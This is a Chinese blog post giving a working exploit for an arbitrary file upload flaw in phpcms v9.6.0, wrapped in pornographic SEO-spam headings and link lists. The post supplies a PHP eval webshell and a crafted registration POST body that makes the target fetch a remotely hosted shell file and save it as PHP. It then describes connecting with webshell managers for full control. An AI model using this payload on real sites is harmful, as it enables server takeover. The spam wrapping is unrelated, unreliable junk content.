多多色-多人伦交性欧美在线观看-多人伦精品一区二区三区视频-多色视频-免费黄色视屏网站-免费黄色在线

國內最全IT社區平臺 聯系我們 | 收藏本站
阿里云優惠2
您當前位置:首頁 > 程序人生 > 隨筆 > phpcms v9.6.0任意文件上傳漏洞

phpcms v9.6.0任意文件上傳漏洞

來源:程序員人生   發布時間:2021-09-16 09:37:19 閱讀次數:6312次

經過親自測試,本漏洞只針對phpcmx V9.6有效

首先我們在服務器上上傳一個shell.txt一句話木門文件,內容為:

<?php @eval($_POST['wlsh']);?>

并且可以訪問:http://www.baidu.com/shell.txt

然后在目標網站注冊會員,打開burp,截斷數據包,把post內容更改為

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=

利用repeater模塊 查看回顯包  得到shell地址。

phpcms v9.6.0任意文件上傳漏洞

通過重新POST后,就可以看到自己上傳的木馬文件,

phpcms v9.6.0任意文件上傳漏洞

然后用中國蟻劍或者菜刀連接后,就可以為所欲為了

這個漏洞危害很大,建議盡快修復!

生活不易,碼農辛苦
如果您覺得本網站對您的學習有所幫助,可以手機掃描二維碼進行捐贈
程序員人生
------分隔線----------------------------
分享到:
------分隔線----------------------------
關閉
程序員人生
主站蜘蛛池模板: 成人做爰毛片免费视频 | 最近在线中文字幕8 | 欧美久久超级碰碰碰二区三区 | 一二三四视频免费观看在线看 | 中国嫩模一级毛片 | 亚洲日本中文字幕在线 | 日本美女一级黄色片 | 最近中文字幕2019年免费 | 伊人| 日本三级s级在线播放 | 欧美三级在线 | 亚洲欧美日韩高清一区二区三区 | 久久亚洲精品一区成人 | 久久精品国产一区二区三区不卡 | 国产三级观看久久 | 亚洲看片网站 | 亚洲人成依人成综合网 | 欧美性88xx| 国产青草亚洲香蕉精品久久 | 欧美人与动人物姣配xxxx | 久久丝袜精品综合网站 | 波多野结衣在线观看免费区 | 欧美黑人巨大videos极品 | 天天夜夜狠狠 | 伊人365影院| 久久精品男人的天堂 | 天天性综合 | 美日韩在线 | 免费视频精品一区二区三区 | 久久精品免看国产成 | 亚洲视屏在线观看 | www.黄色网址 | 波多野结衣视频在线观看地址免费 | 欧美人与物videos另类3d | 中文字幕第十页 | 国产成人综合亚洲亚洲欧美 | 中文字幕日韩一区 | 亚洲精品在线观看视频 | 久久成人国产精品二三区 | 欧美性色一级在线观看 | 一级毛片一级毛片一级级毛片 |